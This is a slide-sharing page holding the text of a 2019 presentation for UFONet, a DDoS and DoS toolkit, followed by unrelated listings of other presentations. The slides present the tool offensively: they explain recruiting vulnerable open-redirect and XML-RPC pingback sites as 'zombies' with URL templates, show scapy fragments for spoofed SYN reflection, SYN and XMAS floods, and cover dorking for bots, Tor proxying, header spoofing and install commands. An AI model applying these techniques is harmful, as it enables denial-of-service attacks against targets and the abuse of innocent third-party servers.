let them hate so long as they fear oderint dum metuant
play

...Let them hate so long as they fear... oderint dum metuant - PowerPoint PPT Presentation

Jul 03, 2023 •172 likes •690 views

#UFONet = ( To0L.AlienWare ) / ninja [ DDoS + DoS ] \ (multi- ProXY / DarkNet ( HTTP(s) / WebAbuse [ Layer7 ] ) +(extra[Layer3]+d0rKng+eVas(h)iVe(CA- che/ge0) +FngPrinting+ sTAT[RanKiNgs+F0RuMS + WarGameS (P2P/ClAns-RanKings)] Denial of

  1. #UFONet = ( To0L.AlienWare ) / ninja [ DDoS + DoS ] \ (multi- ProXY / DarkNet ( HTTP(s) / WebAbuse [ Layer7 ] ) +(extra[Layer3]+d0rKng+eVas(h)iVe(CA- che/ge0) +FngPrinting+ sTAT[RanKiNgs+F0RuMS + WarGameS (P2P/ClAns-RanKings)]… “ Denial of Service Toolkit ” → by psy - @ 2019 #HackRON( TNF)

  2. ...“Let them hate so long as they fear”... …“oderint dum metuant”…

  3. /WARNING!/: ===================================================================== LEGAL DISCLAIMER: Usage of UFONet for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume noliability and are not responsible for any misuse or damage caused by this program. =====================================================================

  4. * FAQ: ufonet.03c8.net/FAQ ===================================================================== + What’s UFONet? + How it works? - [ DDoS / DoS / Extras ] + Installation + Main-Features + GUI + Demo/Video + Contribute =====================================================================

  5. /What’s UFONet?/ ===================================================================== =====================================================================

  6. /What’s UFONet?/ ===================================================================== =====================================================================

  7. /What’s UFONet?/ ===================================================================== (2018) - Average age of individuals arrested by country =====================================================================

  8. /What’s UFONet?/ * Website: ufonet.03c8.net ===================================================================== "On a samurai sword or even any tool, what matters is who goes to use it and for what, not who builds it and when…" + + “A botnet of botnets...” =====================================================================

  9. /What’s UFONet?/ * Last code [01/2019] : v1.2 – “Armageddon!” ===================================================================== + Python + Javascript + HTML5 + CSSv3 + License → GPL v3.0 + First Release: v0.1b → 2013 - Born as XSSer module (2009) ===================================================================== + Toolkit → DDoS (Botnet) + DoS (Direct-attacks) - Exploit OSI/Layer-7 (HTTP) - Exploit OSI/Layer-3 (NETWORK) + Objetive → Resource Depletion =====================================================================

  10. /What’s UFONet?/ ===================================================================== =====================================================================

  11. /How it works?/ ===================================================================== =====================================================================

  12. /How it works?/: DDoS/Botnet * Top10 App Security Risks: OWASP-2013 ===================================================================== + CWE-601: URL Redirection to Untrusted Site A web application accepts a user-controlled input that specifies a link to an external site and uses that link in a Redirect. =====================================================================

  13. /How it works?/: DDoS/Botnet ===================================================================== =====================================================================

  14. /How it works?/: DDoS/Botnet ===================================================================== + Zombies: HTTP GET 'Open Redirect' bot Ex: https://ZOMBIE.com/check?uri=$TARGET + Droids: HTTP GET 'Open Redirect' bot with params required Ex: https://ZOMBIE.COM/css-validator/validator? uri=$TARGET&profile=css3&usermedium=all&vextwarning=true + Aliens: HTTP POST 'Open Redirect' bot Ex: https://ZOMBIE.com/analyze.html;$POST;url=$TARGET + UCAVs: HTTP GET 'Web Abuse' bot Ex: https://www.isup.me/$TARGET + X-RPCs: HTTP POST XML-RPC PingBack Vulnerability Ex: https://ZOMBIE.COM/xmlrpc.php =====================================================================

  15. /How it works?/: DDoS/Botnet ===================================================================== +Q: BUT, is a “strong” DDoS / Botnet?… +R: Well. It depends on how you understand a botnet as "strong"…. 1 - Privacy 2 - Traffic volume 3 - Farming / Hunting 4 - Co-op / Social 5 - Resilence 6 - Libre / Free =====================================================================

  16. /How it works?/: DDoS/Extras ===================================================================== + DBStress → 'HTTP DB' attack + SPRAY → 'TCP-SYN reflection' attack - SYN packets carring fraudulent (spoofed) source IP belonging to target (aka DrDoS) TCP_l = TCP() TCP_l.sport = sport TCP_l.dport = sport TCP_l.seq = seq TCP_l.window = window TCP_l.flags = "S" # SYN SYNACK=(IP_p/TCP_l) TCP_l.flags = "A" # ACK TCP_l.seq = SYNACK.ack+1 TCP_l.ack = SYNACK.seq+1 + SMURF → 'ICMP broadcast' attack - ICMP 'broadcast' package carring fraudulent (spoofed) source IP belonging to target (aka SMURF ) =====================================================================

  17. /How it works?/: DoS/Extras ===================================================================== + LOIC → 'HTTP fast' attack + LORIS → 'HTTP slow' attack + UFOSYN → ‘TCP-SYN' flood attack TCP_l = TCP() TCP_l.sport = sport TCP_l.dport = port TCP_l.flags = "S" # SYN TCP_l.seq = seq TCP_l.window = window + XMAS →'TCP-XMAS' flood attack TCP_l = TCP() TCP_l.sport = s_zombie_port TCP_l.dport = sport TCP_l.seq = seq TCP_l.window = window TCP_l.flags = "UFP" # ALL FLAGS SET (like a XMAS tree) =====================================================================

  18. /Installation/ ===================================================================== =====================================================================

  19. /Installation/: c0d3 ===================================================================== + Official : $ git clone https://code.03c8.net/epsylon/ufonet + Mirror : $ git clone https://github.com/epsylon/ufonet + Packages: .tar.gz / .zip / .torrent / others (APK, .exe). Ex: https://ufonet.03c8.net/ufonet/ufonet-v1.2.tar.gz https://ufonet.03c8.net/ufonet/ufonet-v1.2.zip.torrent + Present on (OS security pentesting releases): ● ParrotOS ● BlackArch ● [...] =====================================================================

  20. /Installation/: Lib$ ===================================================================== + UFONet runs on many platforms: ● GNU/Linux (*Unix) / Win32 / OSx … + It requires: Python (>2.7.9) ● python-pycurl ● python-geoip ● python-whois ● python-crypto ● python-requests ● python-scapy + Script (auto)install: python setup.py install =====================================================================

  21. /Installation/: Shell Banner ===================================================================== =====================================================================

  22. /Main-Features/ ===================================================================== =====================================================================

  23. /Main-Features/: Resume ===================================================================== + Modularity ( core/mods | core/tools ... ): ● Code from scratch (clean) + Proxy: (ex: Tor): Master → Proxy → Proxy(Zombie) → Target + Spoofing: (HTTP Headers) ● User-Agent/Referer/Host/X-Forwarded-For/… + Impact: Multithread Request(s) / Evade cache /... + Manage Botnet ( “Zombie cycle” ) : ● Search 'zombies' on the Internet (Dorking) ● Test vulnerabilities (Open Redirect, XML-RPC…) / Attack-ME ● Check to discard offline bots =====================================================================

  24. /Main-Features/: Options ===================================================================== Options: --version show program's version number and exit -h, --help show this help message and exit -v, --verbose active verbose on requests --timeline show program's code timeline --update check for latest stable version --check-tor check to see if Tor is used properly --force-ssl force usage of SSL/HTTPS requests --force-yes set 'YES' to all questions --gui start GUI (UFONet Web Interface) *Tools*: --crypter Crypt/Decrypt messages using AES256+HMAC-SHA1 --network Show info about your network (MAC, IPs) --xray=XRAY Fast port scanner (ex: --xray 'http(s)://target.com') --xray-ps=XRAYPS Set range of ports to scan (ex: --xray-ps '1-1024') =====================================================================

  25. /Main-Features/: Options (Tools) ===================================================================== --crypter Crypt/Decrypt messages using AES256+HMAC-SHA1 --network Show info about your network (MAC, Ips) =====================================================================

  26. /Main-Features/: Options (Tools) ===================================================================== --xray=XRAY Fast port scanner (ex: --xray 'http(s)://target.com') --xray-ps=XRAYPS Set range of ports to scan (ex: --xray-ps '1-1024') =====================================================================

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

oderint dum metuant... ! Last Release[10/2016]: v0.8\U-NATi0n!

oderint dum metuant... ! Last Release[10/2016]: v0.8\U-NATi0n!

#UFONet (HTTP) WebAbuse ... Ninja DDoS Nation [2016] oderint dum metuant... ! Last Release[10/2016]: v0.8\U-NATi0n! ===================================================================== * Whats UFONet? * How it

878 views • 36 slides
Tackling Hate Crime Partnership working Why report Hate Incidents and/or Crime.. All hate

Tackling Hate Crime Partnership working Why report Hate Incidents and/or Crime.. All hate

Tackling Hate Crime Partnership working Why report Hate Incidents and/or Crime.. All hate incidents and crimes should be reported. to build up patterns of behaviour locally , and highlight areas of concern within your community.

146 views • 10 slides
Anxiety, fear, and the fear Dr. Martin What does it feel like? Davidson, R. Thoughts,

Anxiety, fear, and the fear Dr. Martin What does it feel like? Davidson, R. Thoughts,

Components of anxiety What is fear? What is anxiety? Anxiety, fear, and the fear Dr. Martin What does it feel like? Davidson, R. Thoughts, body sensations, behaviours of fear Psych Panic: Fight/flight Fear of fear

405 views • 3 slides
Ou Our fear of of sharing the gos ospel 1. Feeling inadequate 2. Fear of rejection 3. Fear

Ou Our fear of of sharing the gos ospel 1. Feeling inadequate 2. Fear of rejection 3. Fear

Ou Our fear of of sharing the gos ospel 1. Feeling inadequate 2. Fear of rejection 3. Fear of offending others 4. Fear of being labeled as weird Wh Why y so so ha hard? d? Think Act Be Ch Chapter r 20 Sh Shar

515 views • 17 slides
There is no fear in love (1 John 4:13-21) 1 John 4:18 There is no fear in love, but perfect

There is no fear in love (1 John 4:13-21) 1 John 4:18 There is no fear in love, but perfect

There is no fear in love (1 John 4:13-21) 1 John 4:18 There is no fear in love, but perfect love casts out fear. Questions our text raises: What kind of fear are we talking about? Why is this kind of fear so prevalent? Why

446 views • 12 slides
Hate Speech Detection is Not as Easy as You May Think: A Closer Look at Model Validation Aym

Hate Speech Detection is Not as Easy as You May Think: A Closer Look at Model Validation Aym

Hate Speech Detection is Not as Easy as You May Think: A Closer Look at Model Validation Aym Arango, Jorge Prez and Brbara Poblete UNDETECTED ALMOST PERFECT HATE SPEECH VS STATE-OF-THE-ART IN RESULTS SOCIAL MEDIA UNDETECTED HATE

641 views • 47 slides
radare2 22 y/o french expat @ Luxembourg Food, Travel and Languages <3 I hate

radare2 22 y/o french expat @ Luxembourg Food, Travel and Languages <3 I hate

Maxime Morin (@Maijin212), Anton Kochkov (@akochkov) First r2babies steps - Long Version August 13, 2015 ISSA South Africa radare2 22 y/o french expat @ Luxembourg Food, Travel and Languages <3 I hate Bullshit Malware.lu

1.4k views • 68 slides
Fanning the Flames of Hate: Social Media and Hate Crime Karsten Mller (karstenmuller.eu) Carlo

Fanning the Flames of Hate: Social Media and Hate Crime Karsten Mller (karstenmuller.eu) Carlo

Fanning the Flames of Hate: Social Media and Hate Crime Karsten Mller (karstenmuller.eu) Carlo Schwarz (carloschwarz.eu) Introduction Related Research: Media and Violence Radio Movies Television Broadband Internet (Adena et al. 2012)

661 views • 17 slides
ULRICH SCHNELL Habemus Ulle ulrichschnell.dk ulrich@alfhiem.dk Fear not just be very very

ULRICH SCHNELL Habemus Ulle ulrichschnell.dk ulrich@alfhiem.dk Fear not just be very very

ULRICH SCHNELL Habemus Ulle ulrichschnell.dk ulrich@alfhiem.dk Fear not just be very very carefull So waren die Bojaren Then god and the devil seemd totally irrellevant Fear not for I am with you Fear 2 Fear 3 Experienced barbar Bitter

597 views • 22 slides
Communities Uniting Against Hate Not In Our Town APA Presentation New film A

Communities Uniting Against Hate Not In Our Town APA Presentation New film A

Communities Uniting Against Hate Not In Our Town APA Presentation New film A Prosecutors Stand Hate Crime Reporting Gap Role of Prosecutors in hate crime awareness and enforcement How to engage communities in reporting

538 views • 34 slides
TREATMENT FOR PTSD/SUD The Fear Structure A fear structure is a program for escaping danger

TREATMENT FOR PTSD/SUD The Fear Structure A fear structure is a program for escaping danger

PROLONGED EXPOSURE AS A TREATMENT FOR PTSD/SUD The Fear Structure A fear structure is a program for escaping danger It includes information about: The feared stimuli The fear response The meaning of stimuli and responses

488 views • 12 slides
Necessary Conversations: Nuclear Fear & Nuclear Fear & A First Look at Interrogation

Necessary Conversations: Nuclear Fear & Nuclear Fear & A First Look at Interrogation

Introduction to Homeland Security November 23, 2005 Necessary Conversations: Nuclear Fear & Nuclear Fear & A First Look at Interrogation Policy A First Look at Interrogation Policy Stephen M. Maurer Goldman School of Public Policy

1.16k views • 70 slides
@lady_nerd laura@safestack.io https://safestack.io In this talk Fear and loathing Examining

@lady_nerd laura@safestack.io https://safestack.io In this talk Fear and loathing Examining

@lady_nerd laura@safestack.io https://safestack.io In this talk Fear and loathing Examining the root of fear and its effects Fear-based architecture and antipatterns Fear leads to anger, anger leads to hatred. Fearless security

765 views • 40 slides
Rediscovering the spiritual roots of midwifery Rev Lucyann Ashdown Love and Fear by

Rediscovering the spiritual roots of midwifery Rev Lucyann Ashdown Love and Fear by

Rediscovering the spiritual roots of midwifery Rev Lucyann Ashdown Love and Fear by Michael Leunig There are only two feelings Love and Fear There are only two languages Love and fear There are only two activities Love and fear

117 views • 11 slides
A Community Conversation: Creating Inclusion and Confronting Hate Our purpose To engage in

A Community Conversation: Creating Inclusion and Confronting Hate Our purpose To engage in

A Community Conversation: Creating Inclusion and Confronting Hate Our purpose To engage in conversations about issues of bigotry and hate that are impacting our community and our country To educate ourselves about implicit bias,

487 views • 30 slides
Portraits of Jesus in John We have nothing to fear but fear itself Ask not what your

Portraits of Jesus in John We have nothing to fear but fear itself Ask not what your

Portraits of Jesus in John We have nothing to fear but fear itself Ask not what your country can do for you, ask what you can do for your country God is dead, and we have killed him You must be the change you want to

547 views • 15 slides
Computer Worms A program that copies itself from one computer to another Origins:

Computer Worms A program that copies itself from one computer to another Origins:

Computer Worms A program that copies itself from one computer to another Origins: distributed computations Schoch and Hupp: animations, broadcast messages Segment: part of program copied onto workstation Segment processes

861 views • 35 slides
Communication Systems Firewalls University of Freiburg Computer Science Computer Networks and

Communication Systems Firewalls University of Freiburg Computer Science Computer Networks and

Communication Systems Firewalls University of Freiburg Computer Science Computer Networks and Telematics Prof. Christian Schindelhauer Organization I. Data and voice communication in IP networks II. Security issues in networking

909 views • 39 slides
Cryptography in the Age of Quantum Computers Mark Zhandry MIT Based on joint works with:

Cryptography in the Age of Quantum Computers Mark Zhandry MIT Based on joint works with:

Cryptography in the Age of Quantum Computers Mark Zhandry MIT Based on joint works with: Dan Boneh, zgr Dagdelen, Marc Fischlin, Anja Lehmann, Christian Schaffner Typical Crypto Application m ! Solution: (Private Key) Encryption c ! c

865 views • 58 slides
Foundation of Cryptography (0368-4162-01), Lecture 8 Encryption Schemes Iftach Haitner, Tel Aviv

Foundation of Cryptography (0368-4162-01), Lecture 8 Encryption Schemes Iftach Haitner, Tel Aviv

Definitions Constructions Active Adversaries Foundation of Cryptography (0368-4162-01), Lecture 8 Encryption Schemes Iftach Haitner, Tel Aviv University January 3 17, 2012 Definitions Constructions Active Adversaries Section 1

1.33k views • 112 slides
Software Vulnerabilities in Programming Languages and Applications A presentation to Ada Europe

Software Vulnerabilities in Programming Languages and Applications A presentation to Ada Europe

Software Vulnerabilities in Programming Languages and Applications A presentation to Ada Europe 2010 Stephen Michell, Maurya Software, Ottawa, Canada Security There are people out there trying to attack every computer that we own. Most

503 views • 48 slides
3 Industrial Communication Networks Automation Overview 3 Industrial Communication Networks 3.1

3 Industrial Communication Networks Automation Overview 3 Industrial Communication Networks 3.1

EPFL, Spring 2017 3 Industrial Communication Networks Automation Overview 3 Industrial Communication Networks 3.1 Field bus principles 3.2 Field bus operation 3.3 Standard field busses 3.4 Industrial wireless communication Industrial

1.26k views • 87 slides
All Units...Pick up your Charter Renewal Packet & Schedule your Charter Turn-in (about 15

All Units...Pick up your Charter Renewal Packet & Schedule your Charter Turn-in (about 15

All Units...Pick up your Charter Renewal Packet & Schedule your Charter Turn-in (about 15 minutes) The Dates are: 27 January, Wed. 7 to 9 pm at the Scout office 13 February, Tues. 9 am to 1 pm at Salem Church in Eastover 20

217 views • 19 slides
Introduction Presenter: Jienan Liu Network, Intelligence & security Lab What is Chrome

Introduction Presenter: Jienan Liu Network, Intelligence & security Lab What is Chrome

Chrome Extension Introduction Presenter: Jienan Liu Network, Intelligence & security Lab What is Chrome Extension Extension Small software programs that can modify and enhance the functionality of the Chrome browser. Written

576 views • 18 slides

More recommend